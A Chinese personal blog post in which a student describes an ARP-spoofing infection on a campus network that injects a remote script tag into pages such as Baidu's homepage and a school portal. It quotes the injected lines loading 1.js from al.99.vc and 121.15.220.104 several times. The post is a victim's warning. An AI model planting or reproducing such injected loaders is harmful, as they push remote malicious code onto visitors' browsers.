今天俺在学校图书馆上网,一上网俺就发现不对劲:博客主页在ie下显示不正常。一看代码,有这么一行东西:
当时俺就吓了一条,联系主机商,主机商却说没问题——可是俺这儿一直有问题。这时候,俺无疑中发现,其实很多网站都有问题:<script src=http://al.99.vc/1.js></script>
<!DOCTYPE html PUBLIC "-//W3C//D.......org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
俺们学校网站这时候,俺就怀疑是俺的局域网出了问题,而不是IDC的问题了。
<script src=http://al.99.vc/1.js></script>
<html>
<head>
<title>教务系统信息网</title>
百度首页(百度贴吧则完全正常)
<script src=http://al.99.vc/1.js></script>
<html><head><meta http-equiv=Content-Ty....charset=gb2312">
<title>百度一下,你就知道 </title>
甚至连360ARP防火墙的下载页面,都有了问题(360safe.com首页则正常)
<script src=http://al.99.vc/1.js></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>360ARP防火墙下载</title>
其实在昨天,俺就发现俺们学校的内网遭受了攻击:
这次攻击所插入的代码,正是前几天说过的国内众多网站遭受大规模ARP攻击所使用的代码:
<script src=http://121.15.220.104/1.js></script>当时俺还奇怪:ARP攻击怎么可能攻击到内部服务器呢?现在俺才知道,其实是俺所在的局域网出了问题。估计是一种很常见的ARP病毒。在百度搜121.15.220.104,就能看到很多地方中了招——尤其是大学网站。像是南开大学(nankai.edu.cn)、中山大学(zsu.edu.cn)、中国科技大学(ustc.edu.cn)、河南大学(henu.edu.cn)等,都有人在bbs或者贴吧上报告有121.15.220.104的代码被插入网页。估计这个病毒在教育网比较流行。
<html>
<head>
<title>教务系统信息网</title>
这几天有大量的同学搜索121.15.220.104这个ip到俺这里来,肯定受到了俺的误导。此机会,俺向以前被俺误导的同学们,表示诚挚的歉意!俺太想当然了,太不懂装懂了!!!
希望专业人士给俺指导!
俺今天总结了有关ARP的知识,本来想发到俺们学校贴吧呢,可是百度老是删贴,只好作罢。俺对百度基本失望了……有兴趣的可以到这里看看有关ARP攻击和ARP病毒的东西……
